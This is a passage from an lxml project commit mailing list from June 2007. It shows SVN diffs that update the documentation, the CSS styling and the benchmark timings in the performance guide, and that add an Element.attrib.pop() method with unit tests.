You can enable or disable it explicitly by passing another keyword +argument for the serialisation:: + + >>> print etree.tostring(root, xml_declaration=True) + <?xml version='1.0' encoding='ASCII'?> + <root><test/></root> + +Also see the general remarks on `Unicode support`_. + +.. _`Unicode support`: parsing.html#python-unicode-strings + + +XInclude -------- Simple XInclude support exists. You can let lxml process xinclude statements Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 18:28:50 2007 @@ -1,15 +1,15 @@ body { - /* CSS Hack for IE that does not respect the "margin: auto" rule at the - * document level */ + font: 13px Arial, Verdana, Helvetica, sans-serif; text-align: center; - padding: 1em; } - @media screen { + body { + padding: 1em 1em 1em 21em; + } + div.document { width: 45em; - padding-left: 21em; background-color: white; } } @@ -26,7 +26,6 @@ } div.document { - font: 13px Arial, Verdana, Helvetica, sans-serif; margin: 1em auto 1em auto; color: #222; text-align: left; @@ -50,7 +49,7 @@ /*** side menu ***/ div.sidemenu { - position: fixed; + position: absolute; top: 0px; left: 0px; width: 22em; @@ -62,6 +61,11 @@ background-color: #FFFAFA; } +html > body div.sidemenu { + /* ignored by IE -> everyone else knows 'fixed', right? 
*/ + position: fixed; +} + div.sidemenu span.section.title { line-height: 1.5em; font-size: 130%; Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Tue Jun 12 18:28:50 2007 @@ -55,7 +55,7 @@ def merge_menu(tree, menu, name): menu_root = copy.deepcopy(menu) - tree.getroot()[1][0].append(menu_root) # html->body->div[class=document] + tree.getroot()[1][0].insert(0, menu_root) # html->body->div[class=document] for el in menu_root.getiterator(): tag = el.tag if tag[0] != '{': Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Tue Jun 12 18:28:50 2007 @@ -14,21 +14,26 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm -The statements made here are backed by the benchmark script `bench.py`_ that -comes with the lxml source distribution. The timings cited below compare lxml -1.0 (with libxml2 2.6.24), ElementTree 1.2.6 and cElementTree 1.0.5 under -CPython 2.4.2 on a 1.6GHz AMD64 machine. - -.. _`bench.py`: http://codespeak.net/svn/lxml/branch/lxml-1.0/bench.py - -The ``bench.py`` script runs a number of simple tests on the different -libraries, using different XML tree configurations: different tree sizes, with -or without attributes (-/A) and with or without ASCII or unicode text (-/S/U). -In the result extracts cited below, T1 refers to a 3-level tree with many -children at the third level, T2 is swapped around to have many children at the -root element, T3 is a deep tree with few children at each level and T4 is a -small tree, slightly broader than deep. Most benchmarks run in a loop over -all children of the tree root. 
+The statements made here are backed by the benchmark scripts +`bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with +the lxml source distribution. The timings cited below compare lxml 1.3 (with +libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with +CPython 2.5 (based on ElementTree 1.2.6). They were run single-threaded on a +1.8GHz Intel Core Duo machine. + +.. _`bench_etree.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_etree.py +.. _`bench_xpath.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_xpath.py +.. _`bench_objectify.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_objectify.py + +The scripts run a number of simple tests on the different libraries, using +different XML tree configurations: different tree sizes, with or without +attributes (-/A), with or without ASCII or unicode text (-/S/U), and either +against a tree or its serialised form (T/X). In the result extracts cited +below, T1 refers to a 3-level tree with many children at the third level, T2 +is swapped around to have many children at the root element, T3 is a deep tree +with few children at each level and T4 is a small tree, slightly broader than +deep. If repetition is involved, this usually means running the benchmark in +a loop over all children of the tree root. .. contents:: .. @@ -37,6 +42,7 @@ 3 The ElementTree API 4 Tree traversal 5 XPath + 6 lxml.objectify Bad things first @@ -57,45 +63,57 @@ results are rather impressive. 
Compared to cElementTree, lxml is about 20 to 40 times faster on serialisation:: - lxe: tostring_utf16 (SA T2) 30.9846 msec/pass - cET: tostring_utf16 (SA T2) 715.5002 msec/pass - ET : tostring_utf16 (SA T2) 758.5271 msec/pass - - lxe: tostring_utf16 (U- T3) 3.0509 msec/pass - cET: tostring_utf16 (U- T3) 72.4721 msec/pass - ET : tostring_utf16 (U- T3) 87.0735 msec/pass - - lxe: tostring_utf8 (UA T2) 26.8996 msec/pass - cET: tostring_utf8 (UA T2) 700.4889 msec/pass - ET : tostring_utf8 (UA T2) 745.3317 msec/pass - - lxe: tostring_utf8 (S- T3) 2.1876 msec/pass - cET: tostring_utf8 (S- T3) 71.1290 msec/pass - ET : tostring_utf8 (S- T3) 87.1525 msec/pass + lxe: tostring_utf16 (SATR T1) 21.9206 msec/pass + cET: tostring_utf16 (SATR T1) 461.9428 msec/pass + ET : tostring_utf16 (SATR T1) 486.8946 msec/pass + + lxe: tostring_utf16 (UATR T1) 22.7508 msec/pass + cET: tostring_utf16 (UATR T1) 526.3446 msec/pass + ET : tostring_utf16 (UATR T1) 496.0767 msec/pass + + lxe: tostring_utf16 (S-TR T2) 23.8452 msec/pass + cET: tostring_utf16 (S-TR T2) 537.9200 msec/pass + ET : tostring_utf16 (S-TR T2) 504.4273 msec/pass + + lxe: tostring_utf8 (S-TR T2) 18.2550 msec/pass + cET: tostring_utf8 (S-TR T2) 528.3908 msec/pass + ET : tostring_utf8 (S-TR T2) 549.7071 msec/pass + + lxe: tostring_utf8 (U-TR T3) 2.5497 msec/pass + cET: tostring_utf8 (U-TR T3) 49.8495 msec/pass + ET : tostring_utf8 (U-TR T3) 62.6927 msec/pass For parsing, the difference between the libraries is smaller. 
The (c)ET libraries use the expat parser, which is known to be extremely fast:: - lxe: parse_stringIO (SA T2) 197.7678 msec/pass - cET: parse_stringIO (SA T2) 38.9390 msec/pass - ET : parse_stringIO (SA T2) 364.3468 msec/pass - - lxe: parse_stringIO (UA T3) 48.6735 msec/pass - cET: parse_stringIO (UA T3) 39.7455 msec/pass - ET : parse_stringIO (UA T3) 237.9971 msec/pass + lxe: parse_stringIO (SAXR T1) 150.2380 msec/pass + cET: parse_stringIO (SAXR T1) 25.9311 msec/pass + ET : parse_stringIO (SAXR T1) 222.9431 msec/pass + + lxe: parse_stringIO (S-XR T3) 5.9490 msec/pass + cET: parse_stringIO (S-XR T3) 5.4519 msec/pass + ET : parse_stringIO (S-XR T3) 76.4120 msec/pass + + lxe: parse_stringIO (UAXR T3) 29.3601 msec/pass + cET: parse_stringIO (UAXR T3) 28.9941 msec/pass + ET : parse_stringIO (UAXR T3) 163.5361 msec/pass The expat parser allows cET to be up to 80% faster than lxml on plain parser -performance. The same applies to the ``iterparse()`` function. However, if -you take a complete serialize-parse cycle, the numbers will look similar to -these:: - - lxe: write_utf8_parse_stringIO (S- T1) 187.0444 msec/pass - cET: write_utf8_parse_stringIO (S- T1) 828.4068 msec/pass - ET : write_utf8_parse_stringIO (S- T1) 1181.0658 msec/pass - - lxe: write_utf8_parse_stringIO (UA T2) 213.6599 msec/pass - cET: write_utf8_parse_stringIO (UA T2) 927.2374 msec/pass - ET : write_utf8_parse_stringIO (UA T2) 1297.9678 msec/pass +performance. Similar timings can be observed for the ``iterparse()`` +function.
However, if you take a complete serialize-parse cycle, the numbers +will look similar to these:: + + lxe: write_utf8_parse_stringIO (S-TR T1) 316.6230 msec/pass + cET: write_utf8_parse_stringIO (S-TR T1) 592.1209 msec/pass + ET : write_utf8_parse_stringIO (S-TR T1) 817.9121 msec/pass + + lxe: write_utf8_parse_stringIO (UATR T3) 49.9680 msec/pass + cET: write_utf8_parse_stringIO (UATR T3) 434.6111 msec/pass + ET : write_utf8_parse_stringIO (UATR T3) 574.1441 msec/pass + + lxe: write_utf8_parse_stringIO (SATR T4) 1.2789 msec/pass + cET: write_utf8_parse_stringIO (SATR T4) 12.2640 msec/pass + ET : write_utf8_parse_stringIO (SATR T4) 15.6620 msec/pass For applications that require a high parser throughput and do little serialization, cET is the best choice. Also for iterparse applications that @@ -114,22 +132,20 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1360 0.1214 0.1214 0.1217 0.1232 0.1226 - T2: 0.1258 0.1257 0.1250 0.1348 0.1359 0.1358 - T3: 0.0354 0.0282 0.0288 0.0850 0.0860 0.0862 - T4: 0.0006 0.0006 0.0006 0.0019 0.0018 0.0019 - + T1: 0.1029 0.1005 0.0998 0.1003 0.0998 0.1002 + T2: 0.1035 0.1013 0.1015 0.1090 0.1089 0.1090 + T3: 0.0276 0.0270 0.0273 0.0679 0.0673 0.0673 + T4: 0.0004 0.0004 0.0004 0.0013 0.0013 0.0013 cET: -- S- U- -A SA UA - T1: 0.0417 0.0409 0.0403 0.0410 0.0410 0.0415 - T2: 0.0413 0.0414 0.0413 0.0417 0.0411 0.0417 - T3: 0.0097 0.0100 0.0099 0.0187 0.0142 0.0146 + T1: 0.0277 0.0273 0.0273 0.0272 0.0278 0.0275 + T2: 0.0281 0.0347 0.0281 0.0285 0.0284 0.0284 + T3: 0.0074 0.0074 0.0074 0.0122 0.0102 0.0101 T4: 0.0001 0.0001 0.0001 0.0001 0.0001 0.0001 - ET : -- S- U- -A SA UA - T1: 0.2189 0.2832 0.2210 0.2646 0.2905 0.2214 - T2: 0.3022 0.2322 0.2868 0.3192 0.2290 0.3075 - T3: 0.0519 0.0553 0.0527 0.0601 0.0572 0.0911 - T4: 0.0009 0.0008 0.0008 0.0008 0.0009 0.0009 + T1: 0.1349 0.1962 0.2356 0.1288 0.2642 0.1351 + T2: 0.3104 0.1344 0.3566 0.3857 0.1354 0.4677 + T3: 0.0313 0.0325 0.0312 0.0356 0.3803 0.0364 + T4: 0.0005 0.0005 0.0008 
0.0006 0.0007 0.0006 While lxml is still faster than ET in most cases (30-60%), cET can be up to three times faster than lxml here. One of the reasons is that lxml must @@ -141,29 +157,29 @@ Where ET and cET can quickly create a shallow copy of their list of children, lxml has to create a Python object for each child and collect them in a list:: - lxe: root_getchildren (-- T2 ) 6.3981 msec/pass - cET: root_getchildren (-- T2 ) 0.0651 msec/pass - ET : root_getchildren (-- T2 ) 0.0224 msec/pass + lxe: root_getchildren (--TR T2) 0.3500 msec/pass + cET: root_getchildren (--TR T2) 0.0150 msec/pass + ET : root_getchildren (--TR T2) 0.0091 msec/pass As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: - lxe: create_elements (-- T2 ) 22.0083 msec/pass - cET: create_elements (-- T2 ) 0.3920 msec/pass - ET : create_elements (-- T2 ) 3.0865 msec/pass + lxe: create_elements (--TC T2) 3.7301 msec/pass + cET: create_elements (--TC T2) 0.1960 msec/pass + ET : create_elements (--TC T2) 1.4279 msec/pass Therefore, it is always preferable to create Elements for the document they are supposed to end up in, either as SubElements of an Element or using the explicit ``Element.makeelement()`` call:: - lxe: makeelement (-- T2 ) 4.2658 msec/pass - cET: makeelement (-- T2 ) 0.5658 msec/pass - ET : makeelement (-- T2 ) 3.7136 msec/pass - - lxe: create_subelements (-- T2 ) 3.7640 msec/pass - cET: create_subelements (-- T2 ) 0.5332 msec/pass - ET : create_subelements (-- T2 ) 6.5937 msec/pass + lxe: makeelement (--TC T2) 2.5990 msec/pass + cET: makeelement (--TC T2) 0.3128 msec/pass + ET : makeelement (--TC T2) 1.6940 msec/pass + + lxe: create_subelements (--TC T2) 2.3072 msec/pass + cET: create_subelements (--TC T2) 0.2370 msec/pass + ET : create_subelements (--TC T2) 3.2189 msec/pass So, if the main performance bottleneck of an 
application is creating large XML trees in memory through calls to Element and SubElement, cET is the best @@ -176,13 +192,13 @@ The following benchmark appends all root children of the second tree to the root of the first tree:: - lxe: append_from_document (-- T1,T2) 11.7905 msec/pass - cET: append_from_document (-- T1,T2) 0.4673 msec/pass - ET : append_from_document (-- T1,T2) 2.0460 msec/pass - - lxe: append_from_document (-- T3,T4) 0.1582 msec/pass - cET: append_from_document (-- T3,T4) 0.0224 msec/pass - ET : append_from_document (-- T3,T4) 0.1618 msec/pass + lxe: append_from_document (--TR T1,T2) 4.3468 msec/pass + cET: append_from_document (--TR T1,T2) 0.2608 msec/pass + ET : append_from_document (--TR T1,T2) 1.2310 msec/pass + + lxe: append_from_document (--TR T3,T4) 0.0679 msec/pass + cET: append_from_document (--TR T3,T4) 0.0148 msec/pass + ET : append_from_document (--TR T3,T4) 0.0880 msec/pass Although these are fairly small numbers compared to parsing, this easily shows the different performance classes for lxml and (c)ET. 
Where the latter do not @@ -193,26 +209,26 @@ This difference is not always as visible, but applies to most parts of the API, like inserting newly created elements:: - lxe: insert_from_document (-- T1,T2) 16.2342 msec/pass - cET: insert_from_document (-- T1,T2) 1.1786 msec/pass - ET : insert_from_document (-- T1,T2) 3.6107 msec/pass + lxe: insert_from_document (--TR T1,T2) 6.3150 msec/pass + cET: insert_from_document (--TR T1,T2) 0.4039 msec/pass + ET : insert_from_document (--TR T1,T2) 1.4770 msec/pass Or replacing the child slice by a new element:: - lxe: replace_children_element (-- T1 ) 9.1834 msec/pass - cET: replace_children_element (-- T1 ) 0.9731 msec/pass - ET : replace_children_element (-- T1 ) 14.8213 msec/pass + lxe: replace_children_element (--TC T1) 0.2608 msec/pass + cET: replace_children_element (--TC T1) 0.0238 msec/pass + ET : replace_children_element (--TC T1) 0.1628 msec/pass You should keep this difference in mind when you merge very large trees. On the other hand, deep copying a tree is fast in lxml:: - lxe: deepcopy (-- T1 ) 24.7359 msec/pass - cET: deepcopy (-- T1 ) 450.5479 msec/pass - ET : deepcopy (-- T1 ) 717.8308 msec/pass - - lxe: deepcopy (-- T3 ) 2.1182 msec/pass - cET: deepcopy (-- T3 ) 107.2124 msec/pass - ET : deepcopy (-- T3 ) 173.9782 msec/pass + lxe: deepcopy (--TC T1) 10.6010 msec/pass + cET: deepcopy (--TC T1) 220.2251 msec/pass + ET : deepcopy (--TC T1) 463.7730 msec/pass + + lxe: deepcopy (--TC T3) 8.2979 msec/pass + cET: deepcopy (--TC T3) 53.8740 msec/pass + ET : deepcopy (--TC T3) 118.2799 msec/pass So, for example, if you often need to create independent subtrees from a large tree that you have parsed in, lxml is by far the best choice here. 
@@ -226,39 +242,39 @@ especially if few elements are of interest or the element tag name is known, lxml is a good choice:: - lxe: getiterator_all (-- T2 ) 22.5847 msec/pass - cET: getiterator_all (-- T2 ) 36.8212 msec/pass - ET : getiterator_all (-- T2 ) 46.2846 msec/pass - - lxe: getiterator_islice (-- T2 ) 2.0421 msec/pass - cET: getiterator_islice (-- T2 ) 0.3343 msec/pass - ET : getiterator_islice (-- T2 ) 44.5898 msec/pass - - lxe: getiterator_tag (-- T2 ) 1.9593 msec/pass - cET: getiterator_tag (-- T2 ) 11.7767 msec/pass - ET : getiterator_tag (-- T2 ) 37.5661 msec/pass - - lxe: getiterator_tag_all (-- T2 ) 4.5667 msec/pass - cET: getiterator_tag_all (-- T2 ) 33.5681 msec/pass - ET : getiterator_tag_all (-- T2 ) 37.6200 msec/pass + lxe: getiterator_all (--TR T2) 10.3800 msec/pass + cET: getiterator_all (--TR T2) 28.2831 msec/pass + ET : getiterator_all (--TR T2) 26.0720 msec/pass + + lxe: getiterator_islice (--TR T2) 0.1140 msec/pass + cET: getiterator_islice (--TR T2) 0.2460 msec/pass + ET : getiterator_islice (--TR T2) 26.6550 msec/pass + + lxe: getiterator_tag (--TR T2) 0.3879 msec/pass + cET: getiterator_tag (--TR T2) 9.3720 msec/pass + ET : getiterator_tag (--TR T2) 22.8221 msec/pass + + lxe: getiterator_tag_all (--TR T2) 0.8819 msec/pass + cET: getiterator_tag_all (--TR T2) 27.2939 msec/pass + ET : getiterator_tag_all (--TR T2) 22.8271 msec/pass This similarly shows in ``Element.findall()``:: - lxe: findall (-- T2 ) 26.9907 msec/pass - cET: findall (-- T2 ) 39.1728 msec/pass - ET : findall (-- T2 ) 50.9692 msec/pass - - lxe: findall (-- T3 ) 3.6452 msec/pass - cET: findall (-- T3 ) 12.0210 msec/pass - ET : findall (-- T3 ) 11.2570 msec/pass - - lxe: findall_tag (-- T2 ) 4.6065 msec/pass - cET: findall_tag (-- T2 ) 34.0267 msec/pass - ET : findall_tag (-- T2 ) 36.7813 msec/pass - - lxe: findall_tag (-- T3 ) 0.5884 msec/pass - cET: findall_tag (-- T3 ) 7.6307 msec/pass - ET : findall_tag (-- T3 ) 9.2943 msec/pass + lxe: findall (--TR T2) 10.9370 msec/pass 
+ cET: findall (--TR T2) 28.8639 msec/pass + ET : findall (--TR T2) 27.1060 msec/pass + + lxe: findall (--TR T3) 2.1989 msec/pass + cET: findall (--TR T3) 8.9881 msec/pass + ET : findall (--TR T3) 6.4890 msec/pass + + lxe: findall_tag (--TR T2) 0.9520 msec/pass + cET: findall_tag (--TR T2) 27.2651 msec/pass + ET : findall_tag (--TR T2) 22.7208 msec/pass + + lxe: findall_tag (--TR T3) 0.1700 msec/pass + cET: findall_tag (--TR T3) 6.4540 msec/pass + ET : findall_tag (--TR T3) 5.4770 msec/pass Note that all three libraries currently use the same Python implementation for ``findall()``, except for their native tree iterator. @@ -267,48 +283,52 @@ XPath ----- +The following timings are based on the benchmark script `bench_xpath.py`_. + This part of lxml does not have an equivalent in ElementTree. However, lxml provides more than one way of accessing it and you should take care which part of the lxml API you use. The most straight forward way is to call the ``xpath()`` method on an Element or ElementTree:: - lxe: xpath_method (-- T1) 9.9304 msec/pass - lxe: xpath_method (-- T2) 29.3595 msec/pass - lxe: xpath_method (-- T3) 0.2791 msec/pass - lxe: xpath_method (-- T4) 0.9906 msec/pass + lxe: xpath_method (--TC T1) 1.0180 msec/pass + lxe: xpath_method (--TC T2) 20.3521 msec/pass + lxe: xpath_method (--TC T3) 0.1259 msec/pass + lxe: xpath_method (--TC T4) 1.0169 msec/pass This is well suited for testing and when the XPath expressions are as diverse as the trees they are called on. 
However, if you have a single XPath expression that you want to apply to a larger number of different elements, the ``XPath`` class is the most efficient way to do it:: - lxe: xpath_class (-- T1) 4.7921 msec/pass - lxe: xpath_class (-- T2) 9.6187 msec/pass - lxe: xpath_class (-- T3) 0.2215 msec/pass - lxe: xpath_class (-- T4) 0.2697 msec/pass + lxe: xpath_class (--TC T1) 0.1891 msec/pass + lxe: xpath_class (--TC T2) 3.0179 msec/pass + lxe: xpath_class (--TC T3) 0.0570 msec/pass + lxe: xpath_class (--TC T4) 0.1910 msec/pass Note that this still allows you to use variables in the expression, so you can parse it once and then adapt it through variables at call time. In other cases, where you have a fixed Element or ElementTree and want to run different expressions on it, you should consider the ``XPathEvaluator``:: - lxe: xpath_element (-- T1) 5.3826 msec/pass - lxe: xpath_element (-- T2) 11.3929 msec/pass - lxe: xpath_element (-- T3) 0.2514 msec/pass - lxe: xpath_element (-- T4) 0.3038 msec/pass + lxe: xpath_element (--TR T1) 0.4089 msec/pass + lxe: xpath_element (--TR T2) 5.9960 msec/pass + lxe: xpath_element (--TR T3) 0.1230 msec/pass + lxe: xpath_element (--TR T4) 0.3440 msec/pass While it looks slightly slower, creating an XPath object for each of the expressions generates a much higher overhead here:: - lxe: xpath_class_repeat (-- T1) 6.8099 msec/pass - lxe: xpath_class_repeat (-- T2) 26.7462 msec/pass - lxe: xpath_class_repeat (-- T3) 0.3126 msec/pass - lxe: xpath_class_repeat (-- T4) 1.1111 msec/pass + lxe: xpath_class_repeat (--TC T1) 1.0259 msec/pass + lxe: xpath_class_repeat (--TC T2) 20.4861 msec/pass + lxe: xpath_class_repeat (--TC T3) 0.1280 msec/pass + lxe: xpath_class_repeat (--TC T4) 1.0269 msec/pass lxml.objectify -------------- +The following timings are based on the benchmark script `bench_objectify.py`_. + Objectify is a data-binding API for XML based on lxml.etree, that was added in version 1.1. 
It uses standard Python attribute access to traverse the XML tree. It also features ObjectPath, a fast path language based on the same @@ -325,21 +345,21 @@ tree. It avoids step-by-step Python element instantiations along the path, which can substantially improve the access time:: - lxe: attribute (--T T1) 14.8621 msec/pass - lxe: attribute (--T T2) 61.8820 msec/pass - lxe: attribute (--T T4) 14.9317 msec/pass - - lxe: objectpath (--T T1) 13.7311 msec/pass - lxe: objectpath (--T T2) 58.5930 msec/pass - lxe: objectpath (--T T4) 8.0961 msec/pass - - lxe: attributes_deep (--T T1) 81.4488 msec/pass - lxe: attributes_deep (--T T2) 77.0266 msec/pass - lxe: attributes_deep (--T T4) 27.1226 msec/pass - - lxe: objectpath_deep (--T T1) 63.1915 msec/pass - lxe: objectpath_deep (--T T2) 65.2469 msec/pass - lxe: objectpath_deep (--T T4) 11.0138 msec/pass + lxe: attribute (--TR T1) 10.6189 msec/pass + lxe: attribute (--TR T2) 53.7431 msec/pass + lxe: attribute (--TR T4) 10.3359 msec/pass + + lxe: objectpath (--TR T1) 5.8351 msec/pass + lxe: objectpath (--TR T2) 48.1579 msec/pass + lxe: objectpath (--TR T4) 5.6930 msec/pass + + lxe: attributes_deep (--TR T1) 58.7430 msec/pass + lxe: attributes_deep (--TR T2) 63.0901 msec/pass + lxe: attributes_deep (--TR T4) 17.4620 msec/pass + + lxe: objectpath_deep (--TR T1) 52.1719 msec/pass + lxe: objectpath_deep (--TR T2) 52.9201 msec/pass + lxe: objectpath_deep (--TR T4) 7.5650 msec/pass Note, however, that parsing ObjectPath expressions is not for free either, so this is most effective for frequently accessing the same element. 
@@ -361,13 +381,17 @@ subtrees and elements) to cache, you can trade memory usage against access speed:: - lxe: attribute_cached (--T T1) 10.8343 msec/pass - lxe: attribute_cached (--T T2) 55.5890 msec/pass - lxe: attribute_cached (--T T4) 10.9514 msec/pass - - lxe: attributes_deep_cached (--T T1) 63.7080 msec/pass - lxe: attributes_deep_cached (--T T2) 65.6838 msec/pass - lxe: attributes_deep_cached (--T T4) 15.4514 msec/pass + lxe: attribute_cached (--TR T1) 7.9739 msec/pass + lxe: attribute_cached (--TR T2) 50.9331 msec/pass + lxe: attribute_cached (--TR T4) 7.8540 msec/pass + + lxe: attributes_deep_cached (--TR T1) 51.1391 msec/pass + lxe: attributes_deep_cached (--TR T2) 55.7129 msec/pass + lxe: attributes_deep_cached (--TR T4) 10.7968 msec/pass + + lxe: objectpath_deep_cached (--TR T1) 47.6151 msec/pass + lxe: objectpath_deep_cached (--TR T2) 48.0802 msec/pass + lxe: objectpath_deep_cached (--TR T4) 4.0281 msec/pass Things to note: you cannot currently use ``weakref.WeakKeyDictionary`` objects for this as lxml's element objects do not support weak references (which are Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:28:50 2007 @@ -1406,6 +1406,20 @@ for key, value in sequence_or_dict: _setAttributeValue(self._element, key, value) + def pop(self, key, *default): + if python.PyTuple_GET_SIZE(default) > 1: + raise TypeError, "pop expected at most 2 arguments, got %d" % \ + (python.PyTuple_GET_SIZE(default)+1) + result = _getAttributeValue(self._element, key, None) + if result is None: + if python.PyTuple_GET_SIZE(default) == 0: + raise KeyError, key + else: + return python.PyTuple_GET_ITEM(default, 0) + else: + _delAttribute(self._element, key) + return result + # ACCESSORS def __repr__(self): return repr(dict( _attributeIteratorFactory(self._element, 3) )) Modified: 
lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:28:50 2007 @@ -70,6 +70,39 @@ self.assertEquals("TEST", root.get("attr")) self.assertRaises(TypeError, root.set, "newattr", 5) + def test_attrib_pop(self): + ElementTree = self.etree.ElementTree + + f = StringIO('<doc one="One" two="Two"/>') + doc = ElementTree(file=f) + root = doc.getroot() + self.assertEquals('One', root.attrib['one']) + self.assertEquals('Two', root.attrib['two']) + + self.assertEquals('One', root.attrib.pop('one')) + + self.assertEquals(None, root.attrib.get('one')) + self.assertEquals('Two', root.attrib['two']) + + def test_attrib_pop_unknown(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertRaises(KeyError, root.attrib.pop, 'NONE') + + self.assertEquals('One', root.attrib['one']) + self.assertEquals('Two', root.attrib['two']) + + def test_attrib_pop_default(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertEquals('Three', root.attrib.pop('three', 'Three')) + + def test_attrib_pop_empty_default(self): + root = self.etree.XML('<doc/>') + self.assertEquals('Three', root.attrib.pop('three', 'Three')) + + def test_attrib_pop_invalid_args(self): + root = self.etree.XML('<doc one="One" two="Two"/>') + self.assertRaises(TypeError, root.attrib.pop, 'One', None, None) + def test_pi(self): # lxml.etree separates target and text Element = self.etree.Element From scoder at codespeak.net Tue Jun 12 18:38:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:38:31 +0200 (CEST) Subject: [Lxml-checkins] r44179 - lxml/branch/lxml-1.3/doc Message-ID: <20070612163831.E0F23818F@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:38:31 2007 New Revision: 44179 Modified: lxml/branch/lxml-1.3/doc/api.txt Log: merged in 
XInclude doc update from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 18:38:31 2007 @@ -32,7 +32,7 @@ 4 Iteration 5 Error handling on exceptions 6 Serialisation - 7 xinclude + 7 XInclude and ElementInclude 8 write_c14n on ElementTree @@ -257,11 +257,11 @@ .. _`Unicode support`: parsing.html#python-unicode-strings -XInclude --------- +XInclude and ElementInclude +--------------------------- -Simple XInclude support exists. You can let lxml process xinclude statements -in a document by calling the xinclude() method on a tree:: +You can let lxml process xinclude statements in a document by calling the +xinclude() method on a tree:: >>> data = StringIO('''\ ... <doc xmlns:xi="http://www.w3.org/2001/XInclude"> @@ -271,8 +271,19 @@ >>> tree = etree.parse(data) >>> tree.xinclude() - >>> etree.tostring(tree.getroot()) - '<doc xmlns:xi="http://www.w3.org/2001/XInclude">\n<foo/>\n<a xml:base="doc/test.xml"/>\n</doc>' + >>> print etree.tostring(tree.getroot()) + <doc xmlns:xi="http://www.w3.org/2001/XInclude"> + <foo/> + <a xml:base="doc/test.xml"/> + </doc> + +Note that the ElementTree compatible ElementInclude_ module is also supported +as ``lxml.ElementInclude``. It has the additional advantage of supporting +custom `URL resolvers`_ at the Python level. The normal XInclude mechanism +cannot deploy these. If you need ElementTree compatibility or custom +resolvers, you have to stick to the external Python module. + +.. _ElementInclude: http://effbot.org/zone/element-xinclude.htm write_c14n on ElementTree From scoder at codespeak.net Tue Jun 12 18:53:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:53:58 +0200 (CEST) Subject: [Lxml-checkins] r44180 - in lxml/branch/lxml-1.3: . 
benchmark doc src/lxml src/lxml/tests Message-ID: <20070612165358.4B3308194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:53:57 2007 New Revision: 44180 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/build.txt lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/doc/sax.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/serializer.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_sax.py Log: merged in revs up to 42695 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:53:57 2007 @@ -8,17 +8,25 @@ Features added -------------- +* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support + adding processing instructions and comments around the root node + * Element.attrib now has a ``pop()`` method -* Support for custom Element class instantiation in lxml.sax +* Support for custom Element class instantiation in lxml.sax: passing a + ``makeelement()`` function to the ElementTreeContentHandler will reuse the + lookup context of that function * '.' represents empty ObjectPath (identity) -* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` - Bugs fixed ---------- +* Documents lost their top-level PIs and comments on serialisation + +* lxml.sax failed on comments and PIs. Comments are now properly ignored and + PIs are copied. 
+ * Raise AssertionError when passing strings containing '\0' bytes Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Tue Jun 12 18:53:57 2007 @@ -18,6 +18,19 @@ for child in reversed(root): pass + def bench_first_child(self, root): + for i in range(1000): + child = root[0] + + def bench_last_child(self, root): + for i in range(1000): + child = root[-1] + + def bench_middle_child(self, root): + pos = len(root) / 2 + for i in range(1000): + child = root[pos] + @with_attributes(True, False) @with_text(text=True, utext=True) def bench_tostring_utf8(self, root): Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 18:53:57 2007 @@ -1,6 +1,6 @@ -========================== -Frequently Asked Questions -========================== +================================ +Frequently Asked Questions (FAQ) +================================ See also the notes on compatibility_ to ElementTree_. @@ -15,25 +15,28 @@ 1.3 What standards does 